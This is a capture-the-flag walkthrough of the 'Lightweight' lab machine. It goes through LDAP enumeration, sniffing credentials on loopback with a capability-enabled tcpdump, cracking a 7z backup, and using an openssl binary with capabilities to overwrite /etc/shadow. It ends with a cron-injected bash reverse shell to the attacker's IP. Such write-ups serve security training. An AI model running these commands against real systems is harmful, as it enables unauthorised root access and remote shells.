Today, we’re going to solve another CTF machine “Lightweight”. It is now retired box and can be accessible to VIP member.
Specifications
- Target OS: Linux
- IP Address: 10.10.10.119
- Difficulty: Medium
Weakness
- Abusing Linux Capabilities
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
nmap -sC -sV -Pn 10.10.10.119
22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA) | 256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA) |_ 256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16) |_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 |_http-title: Lightweight slider evaluation page - slendr 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X | ssl-cert: Subject: commonName=lightweight.htb | Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain | Not valid before: 2018-06-09T13:32:51 |_Not valid after: 2019-06-09T13:32:51 |_ssl-date: TLS randomness does not represent time
We got 3 Ports running SSH – 22 / HTTP – 80 / Ldap – 389. Let’s take a look at Ldap first.
LDAP Enumeration
Enumerating LDAP using ldapsearch tool.
ldapsearch -h 10.10.10.119 -p 389 -x -b dc=lightweight,dc=htb
# extended LDIF # # LDAPv3 # base <dc=lightweight,dc=htb> with scope subtree # filter: (objectclass=*) # requesting: ALL # # lightweight.htb dn: dc=lightweight,dc=htb objectClass: top objectClass: dcObject objectClass: organization o: lightweight htb dc: lightweight # Manager, lightweight.htb dn: cn=Manager,dc=lightweight,dc=htb objectClass: organizationalRole cn: Manager description: Directory Manager # People, lightweight.htb dn: ou=People,dc=lightweight,dc=htb objectClass: organizationalUnit ou: People # Group, lightweight.htb dn: ou=Group,dc=lightweight,dc=htb objectClass: organizationalUnit ou: Group # ldapuser1, People, lightweight.htb dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb uid: ldapuser1 cn: ldapuser1 sn: ldapuser1 mail: [email protected] objectClass: person objectClass: organizationalPerson objectClass: inetOrgPerson objectClass: posixAccount objectClass: top objectClass: shadowAccount userPassword:: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2R oai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv shadowLastChange: 17691 shadowMin: 0 shadowMax: 99999 shadowWarning: 7 loginShell: /bin/bash uidNumber: 1000 gidNumber: 1000 homeDirectory: /home/ldapuser1 # ldapuser2, People, lightweight.htb dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb uid: ldapuser2 cn: ldapuser2 sn: ldapuser2 mail: [email protected] objectClass: person objectClass: organizationalPerson objectClass: inetOrgPerson objectClass: posixAccount objectClass: top objectClass: shadowAccount userPassword:: e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdms zYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x shadowLastChange: 17691 shadowMin: 0 shadowMax: 99999 shadowWarning: 7 loginShell: /bin/bash uidNumber: 1001 gidNumber: 1001 homeDirectory: /home/ldapuser2 # ldapuser1, Group, lightweight.htb dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb objectClass: posixGroup objectClass: top cn: ldapuser1 userPassword:: e2NyeXB0fXg= gidNumber: 1000 # ldapuser2, Group, lightweight.htb dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb objectClass: posixGroup objectClass: top cn: ldapuser2 userPassword:: e2NyeXB0fXg= gidNumber: 1001 # search result search: 2 result: 0 Success # numResponses: 9 # numEntries: 8
We found some interesting information such as,
Username: ldapuser1 Password: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2Roai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv Username: ldapuser2 Password: e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdmszYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x
After decoding Base64 we got these hashes.
{crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
{crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
The encryption is SHA512 i tried cracking it but didn’t work.
Enumeration
Let’s do some enumeration and browse URL http://10.10.10.119
Generally in CTF’s methodology we have to enumerate for hidden directories and files. But in this case it blocked us due to some-kind of firewall so we have to enumerate manually.
Going to user.php page it tells us that you’re SSH account is created.
“This server lets you get in with ssh. Your IP (10.10.14.17) is automatically added as userid and password within a minute of your first HTTP page request. We strongly suggest you to change your password as soon as you get in the box.”
Let’s login to SSH
We got nothing in current directory let’s find out what other users we have here cat /etc/passwd
Let’s enumerate more with LinEnum.sh script
After running the script we can see files with POSIX capabilities set.
Linux capabilities feature use to give a binary certain permissions which are needed to perform daily tasks without giving a user root permission or making it SUID binary.
The binary tcpdump has cap_net_admin,cap_net_raw+ep capabilities enabled.
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
**CAP_NET_RAW**
* Use RAW and PACKET sockets;
* bind to any address for transparent proxying.
Let’s run tcpdump and save the output.
tcpdump -i lo port 389 -w capture.cap -v
Let’s transfer capture.cap file into our local machine.
scp [email protected]:/home/10.10.14.17/capture.cap capture.cap
Username: ldapuser2 Password: 8bc8251332abe1d7f105d3e53ad39ac2
Now let’s go back to our SSH session and switch user with this current creds.
[[email protected] ~]$ su ldapuser2 Password: 8bc8251332abe1d7f105d3e53ad39ac2 [[email protected] 10.10.14.17]$
We owned user.txt
Privilege Escalation
Let’s head towards getting root.txt flag. There’s a file backup.7z it’s password protected let’s transfer it to our local machine and try cracking it.
Let’s encode backup.7z into Base64 and decode into our local machine.
I used this tool to dictionary attack backup.7z
python main.py --files backup.7z --wordlist rockyou.txt
After extracting the 7z file we got some php files.
If we cat status.php | head -30
ldapuser1 f3ca9d298a553da117442deeb6fa932d
We got the ldapuser1 creds let’s su - ldapuser1
[[email protected] ~]$ su - ldapuser1 Password: f3ca9d298a553da117442deeb6fa932d
let’s look at the files inside /home/ldapuser1/
We have some php files which doesn’t include any interesting information. Let’s check the capabilities of openssl and tcpdump binary.
[[email protected] ~]$ getcap -r . ./tcpdump = cap_net_admin,cap_net_raw+ep ./openssl =ep
./openssl enc -base64 -in /root/root.txt -out ./root.txt.b64
Getting Root By Abusing Linux Capabilities
Let’s modify /etc/shadow file to modify root password using openssl capability.
[[email protected] ~]$ ./openssl enc -base64 -in /etc/shadow -out ./shadow.b64 [[email protected] ~]$ base64 -d shadow.b64 > shadow
We need to created a salted password using openssl let’s use root as username/password.
[[email protected] ~]$ openssl passwd -1 -salt root root $1$root$9gr5KxwuEdiI80GtIzd.U0
Replace the salted password inside shadow file which we copied.
cat shadow | head -1
We can use openssl capabilities to replace our modified shadow file with original /etc/shadow file.
./openssl enc -in shadow -out /etc/shadow
And we got root!
We can also run cronjob and spawn a reverse shell as root.
[[email protected] ~]$ cp /etc/crontab . [[email protected] ~]$ echo '* * * * * root /bin/bash -i >& /dev/tcp/10.10.14.17/1337 0>&1' >> crontab [[email protected] ~]$ base64 crontab > crontab.b64 [[email protected] ~]$ ./openssl enc -d -base64 -in crontab.b64 -out /etc/crontab
Now, let’s wait for a minute and start a listener and you’ll get shell.
